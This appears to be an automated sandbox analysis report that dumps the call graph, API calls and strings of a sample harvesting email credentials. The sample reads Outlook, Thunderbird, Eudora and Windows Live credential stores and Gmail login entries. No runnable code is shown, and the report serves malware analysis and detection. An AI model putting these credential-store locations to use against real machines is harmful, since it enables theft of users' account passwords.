33570->33732 33575 402ca4 33575->33565 33575->33566 33576 402d8c 33575->33576 33733 402bc3 39 API calls 33575->33733 33734 4104d7 RegEnumKeyExA 33575->33734 33576->33565 33577->33456 33578->33460 33579->33464 33581 41018b 33580->33581 33582 410166 FreeLibrary 33581->33582 33583 403dca 33582->33583 33583->33469 33735 410411 RegOpenKeyExA 33584->33735 33586 402feb 33587 402ff8 memset 33586->33587 33588 40311e 33586->33588 33736 4104d7 RegEnumKeyExA 33587->33736 33588->33473 33590 403114 RegCloseKey 33590->33588 33591 410493 3 API calls 33592 40304a memset sprintf 33591->33592 33737 410411 RegOpenKeyExA 33592->33737 33594 403094 memset 33738 4104d7 RegEnumKeyExA 33594->33738 33596 4030eb RegCloseKey 33598 403025 33596->33598 33598->33590 33598->33591 33598->33594 33598->33596 33599 4104d7 RegEnumKeyExA 33598->33599 33739 402da5 26 API calls 33598->33739 33599->33598 33601 4032c7 33600->33601 33602 40339b 33600->33602 33740 4021ad memset 33601->33740 33615 4034d6 memset memset 33602->33615 33604 4032d3 33741 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33604->33741 33606 4032dc 33607 4032ea memset GetPrivateProfileSectionA 33606->33607 33742 4023d7 16 API calls 33606->33742 33607->33602 33609 403321 33607->33609 33609->33602 33610 40338d strlen 33609->33610 33743 4021ad memset 33609->33743 33744 403158 strlen GetPrivateProfileStringA strchr strlen memcpy 33609->33744 33745 4023d7 16 API calls 33609->33745 33610->33602 33610->33609 33612 403342 strchr 33612->33609 33616 410493 3 API calls 33615->33616 33617 403531 33616->33617 33618 403571 33617->33618 33619 403538 _mbscpy 33617->33619 33623 403977 33618->33623 33746 406af3 strlen _mbscat 33619->33746 33621 403557 _mbscat 33747 4033e2 19 API calls 33621->33747 33748 404666 _mbscpy 33623->33748 33627 40399c 33629 4039f1 33627->33629 33749 40edd5 memset memset 33627->33749 33770 40f057 33627->33770 33786 4038da 21 API calls 33627->33786 33630 404780 FreeLibrary 33629->33630 33631 4039fd 33630->33631 33632 4037bc memset memset 33631->33632 33794 443a35 memset 33632->33794 33635 4038d4 33635->33483 33698 40eca9 303 API calls 33635->33698 33637 403820 33638 406ca4 2 API calls 33637->33638 33639 403835 33638->33639 33640 406ca4 2 API calls 33639->33640 33641 403847 strchr 33640->33641 33642 403876 _mbscpy 33641->33642 33643 403889 strlen 33641->33643 33644 4038b1 _mbscpy 33642->33644 33643->33644 33645 403896 sprintf 33643->33645 33806 4023d7 16 API calls 33644->33806 33645->33644 33648 4446d0 33647->33648 33649 40f488 RegOpenKeyExA 33648->33649 33650 40f4b3 RegOpenKeyExA 33649->33650 33651 403e6c 33649->33651 33652 40f5a5 RegCloseKey 33650->33652 33653 40f4cd RegQueryValueExA 33650->33653 33661 40f2e4 33651->33661 33652->33651 33654 40f59b RegCloseKey 33653->33654 33655 40f4fc 33653->33655 33654->33652 33656 40472f 3 API calls 33655->33656 33657 40f509 33656->33657 33657->33654 33658 40f591 LocalFree 33657->33658 33659 40f555 memcpy memcpy 33657->33659 33658->33654 33811 40f177 11 API calls 33659->33811 33662 406e4c GetVersionExA 33661->33662 33663 40f305 33662->33663 33664 4045d6 7 API calls 33663->33664 33667 40f321 33664->33667 33665 404651 FreeLibrary 33666 403e72 33665->33666 33673 4437d7 memset 33666->33673 33668 40f45e 33667->33668 33669 40f38b memset WideCharToMultiByte 33667->33669 33668->33665 33669->33667 33670 40f3bb _strnicmp 33669->33670 33670->33667 33671 40f3d3 WideCharToMultiByte 33670->33671 33671->33667 33672 40f400 WideCharToMultiByte 33671->33672 33672->33667 33674 41072b 9 API calls 33673->33674 33675 443816 33674->33675 33812 40732d strlen strlen 33675->33812 33680 41072b 9 API calls 33681 44383d 33680->33681 33682 40732d 3 API calls 33681->33682 33683 443847 33682->33683 33684 4436ff 65 API calls 33683->33684 33685 443853 memset memset 33684->33685 33686 410493 3 API calls 33685->33686 33687 4438a6 ExpandEnvironmentStringsA strlen 33686->33687 33688 4438e1 _strcmpi 33687->33688 33689 4438d2 33687->33689 33690 403e7e 33688->33690 33691 4438f9 33688->33691 33689->33688 33690->33266 33692 4436ff 65 API calls 33691->33692 33692->33690 33693->33445 33694->33449 33695->33457 33696->33461 33697->33465 33698->33483 33699->33485 33700->33502 33701->33506 33702->33499 33704 40818e 33703->33704 33705 410411 RegOpenKeyExA 33704->33705 33705->33515 33706->33521 33707->33521 33708->33525 33709->33527 33710->33521 33711->33530 33712->33536 33713->33536 33714->33539 33715->33536 33717 404651 FreeLibrary 33716->33717 33718 4045de LoadLibraryA 33717->33718 33719 40464c 33718->33719 33720 4045ef GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33718->33720 33719->33543 33719->33545 33719->33547 33721 404638 33720->33721 33722 40463e 33721->33722 33723 404651 FreeLibrary 33721->33723 33722->33719 33723->33719 33725 403cbf 33724->33725 33726 404657 FreeLibrary 33724->33726 33725->33557 33726->33725 33727->33555 33728->33561 33729->33575 33730->33569 33731->33570 33732->33575 33733->33575 33734->33575 33735->33586 33736->33598 33737->33598 33738->33598 33739->33598 33740->33604 33741->33606 33742->33607 33743->33612 33744->33609 33745->33609 33746->33621 33747->33618 33748->33627 33787 407649 33749->33787 33752 407649 _mbsnbcat 33753 40ef18 RegOpenKeyExA 33752->33753 33754 40ef38 RegQueryValueExA 33753->33754 33755 40f04e 33753->33755 33756 40f045 RegCloseKey 33754->33756 33757 40ef65 33754->33757 33755->33627 33756->33755 33757->33756 33766 40efea 33757->33766 33791 404666 _mbscpy 33757->33791 33759 40ef86 33761 40472f 3 API calls 33759->33761 33767 40ef8b 33761->33767 33762 40f013 RegQueryValueExA 33762->33756 33763 40f036 33762->33763 33763->33756 33764 40efdf 33765 404780 FreeLibrary 33764->33765 33765->33766 33766->33756 33792 4012ee strlen 33766->33792 33767->33764 33768 40efd6 LocalFree 33767->33768 33769 40efba memcpy 33767->33769 33768->33764 33769->33768 33793 404666 _mbscpy 33770->33793 33772 40f06f 33773 4045d6 7 API calls 33772->33773 33774 40f07d 33773->33774 33775 40f157 33774->33775 33776 40472f 3 API calls 33774->33776 33777 404651 FreeLibrary 33775->33777 33781 40f08a 33776->33781 33778 40f166 33777->33778 33779 404780 FreeLibrary 33778->33779 33780 40f171 33779->33780 33780->33627 33781->33775 33782 40f10c WideCharToMultiByte 33781->33782 33783 40f12d strlen 33782->33783 33784 40f14e LocalFree 33782->33784 33783->33784 33785 40f13d _mbscpy 33783->33785 33784->33775 33785->33784 33786->33627 33788 407675 33787->33788 33789 407656 _mbsnbcat 33788->33789 33790 407679 33788->33790 33789->33788 33790->33752 33791->33759 33792->33762 33793->33772 33807 410411 RegOpenKeyExA 33794->33807 33796 443a6f 33797 40380c 33796->33797 33808 410452 RegQueryValueExA 33796->33808 33797->33635 33805 4021ad memset 33797->33805 33799 443a88 33800 443ac0 RegCloseKey 33799->33800 33809 410452 RegQueryValueExA 33799->33809 33800->33797 33802 443aa5 33802->33800 33810 443d5d 30 API calls 33802->33810 33804 443abe 33804->33800 33805->33637 33806->33635 33807->33796 33808->33799 33809->33802 33810->33804 33811->33658 33813 407358 33812->33813 33814 40734a _mbscat 33812->33814 33815 4436ff 33813->33815 33814->33813 33832 407c2c 33815->33832 33818 44373a 33819 443761 33818->33819 33820 443745 33818->33820 33840 407c87 33818->33840 33821 407c2c 9 API calls 33819->33821 33853 443683 52 API calls 33820->33853 33829 44378d 33821->33829 33823 407c87 9 API calls 33823->33829 33824 4437bb 33850 407d1f 33824->33850 33828 407d1f FindClose 33830 4437d1 33828->33830 33829->33823 33829->33824 33831 4436ff 65 API calls 33829->33831 33854 407bf1 strcmp strcmp 33829->33854 33830->33680 33831->33829 33833 407d1f FindClose 33832->33833 33834 407c39 33833->33834 33835 406ca4 2 API calls 33834->33835 33836 407c4c strlen strlen 33835->33836 33837 407c70 33836->33837 33838 407c79 33836->33838 33855 406e81 strlen _mbscat _mbscpy _mbscat 33837->33855 33838->33818 33841 407c92 FindFirstFileA 33840->33841 33842 407cb3 FindNextFileA 33840->33842 33845 407cce 33841->33845 33843 407cd5 strlen strlen 33842->33843 33844 407cc9 33842->33844 33847 407d0e 33843->33847 33848 407d05 33843->33848 33846 407d1f FindClose 33844->33846 33845->33843 33845->33847 33846->33845 33847->33818 33856 406e81 strlen _mbscat _mbscpy _mbscat 33848->33856 33851 407d32 33850->33851 33852 407d28 FindClose 33850->33852 33851->33828 33852->33851 33853->33818 33854->33829 33855->33838 33856->33847 33857->33284 33858->33279 33859->33290 33860->33291 33861->33297 33862->33294 33863->33289 34033 426928 CloseHandle memset memset 34191 405f2b 12 API calls 34193 42df2e 127 API calls 32967 410531 32970 410344 32967->32970 32971 410351 32970->32971 32972 410398 memset GetPrivateProfileStringA 32971->32972 32973 41035f memset 32971->32973 32978 4073d5 strlen 32972->32978 32983 40735c sprintf memcpy 32973->32983 32976 410381 WritePrivateProfileStringA 32977 4103da 32976->32977 32979 4073e9 32978->32979 32981 4073eb 32978->32981 32979->32977 32980 407432 32980->32977 32981->32980 32984 40710b strtoul 32981->32984 32983->32976 32984->32981 34194 43f332 133 API calls 34196 418f35 61 API calls 34198 425e13 109 API calls 34040 411136 InterlockedCompareExchange RtlInitializeCriticalSection 34042 425e13 19 API calls 34046 440132 34 API calls 34048 4111c1 RtlInitializeCriticalSection memset 34203 4157c8 16 API calls 34205 43f3ce 138 API calls 34051 4275cd 44 API calls 34207 424852 108 API calls 34209 42dbd4 18 API calls 34054 40c5d8 18 API calls 34210 432bda 16 API calls 34211 43ebd9 22 API calls 33883 4105dd FindResourceA 33884 4105f6 SizeofResource 33883->33884 33887 410620 33883->33887 33885 410607 LoadResource 33884->33885 33884->33887 33886 410615 LockResource 33885->33886 33885->33887 33886->33887 34214 4013de 15 API calls 34217 424852 76 API calls 34058 4141e7 15 API calls 34219 43ebdd 25 API calls 34220 43efec 18 API calls 34222 443ff5 _onexit 34060 4021f6 14 API calls 34224 427bfb 36 API calls 34062 433982 16 API calls 34064 411182 InterlockedCompareExchange RtlDeleteCriticalSection 34227 412786 _endthreadex 34065 401591 8 API calls 34230 432b91 15 API calls 34231 43eb91 17 API calls 34068 410597 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34232 43ff95 20 API calls 34233 42af9d 31 API calls 34234 424852 119 API calls 34236 4143a4 18 API calls 34239 409fae 12 API calls 34073 419db5 42 API calls 34240 4167b5 memset 34241 4293b4 10 API calls 34074 40f5b8 70 API calls 34076 4375b9 22 API calls 34246 4243bd 15 API calls

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00408043 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 129 408043-40818c memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 4081c2-4081c5 129->130 131 40818e 129->131 133 4081f6-4081fa 130->133 134 4081c7-4081d0 130->134 132 408194-40819d 131->132 135 4081a4-4081c0 132->135 136 40819f-4081a3 132->136 137 4081d2-4081d6 134->137 138 4081d7-4081f4 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                    • Opcode ID: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                    • Instruction ID: 839b780f30062d9b3c48c7c4bb1edbc251b0819f5d773de0f2740150403ea89f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79ae67408c577b497298e938f7cc844113f9d56d662cffe44a33c18994f8cf05
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D151D771C0025DAEDB11CBA8CC41BEEBBBCEF49314F0441EAE555AA182D3389B45CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407C87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 432 407c87-407c90 433 407c92-407cb1 FindFirstFileA 432->433 434 407cb3-407cc7 FindNextFileA 432->434 437 407cce-407cd3 433->437 435 407cd5-407d03 strlen * 2 434->435 436 407cc9 call 407d1f 434->436 440 407d12 435->440 441 407d05-407d10 call 406e81 435->441 436->437 437->435 439 407d18-407d1e 437->439 443 407d15-407d17 440->443 441->443 443->439
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407C9D
                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,0044375D,*.oeaccount,.8D,?,00000104), ref: 00407CBB
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407CEB
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407CF3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                    • String ID: .8D
                                                                                                                                                                                                                    • API String ID: 379999529-2881260426
                                                                                                                                                                                                                    • Opcode ID: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                    • Instruction ID: eb3e2fb57be8f0c3c515892a2c877e6408fe4d7e79a86a2feb9bdace6263c32c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 154419784104938abdfe7f8196f43bddff311a2641cbca57966d1cc2155f4921
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F11A072909201AFE3109B38D844AEB73DCEF45325F600A2FF05AE31C1EB38A9409729
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401E60 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FA8
                                                                                                                                                                                                                    • atoi.MSVCRT ref: 00401FD7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FFA
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402027
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040207D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402092
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00402098
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020A6
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020D9
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004020E7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040200F
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                                      • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040216E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402178
                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 00402193
                                                                                                                                                                                                                      • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                    • Opcode ID: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                    • Instruction ID: f32954dd371ee46ce489a3e15048bba03ea5248cf67d2e34683548b394895fb7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6aa4cd9d89fa12e6f5449d6eef6c1575bbd370b4a07fc5a8c776129ac04f2371
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA91D772804118AAEB21E7A1CC46FDF77BC9F54315F1400BBF608F2182EB789B858B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CC66 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404A94: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                      • Part of subcall function 00404A94: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                      • Part of subcall function 00404A94: FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                      • Part of subcall function 00404A94: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040CEB2
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040CEC8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                    • API String ID: 745651260-375988210
                                                                                                                                                                                                                    • Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                    • Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403C03 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                                                    • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                    • API String ID: 1197458902-317895162
                                                                                                                                                                                                                    • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                    • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F478 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                      • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                    • API String ID: 2768085393-888555734
                                                                                                                                                                                                                    • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                    • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

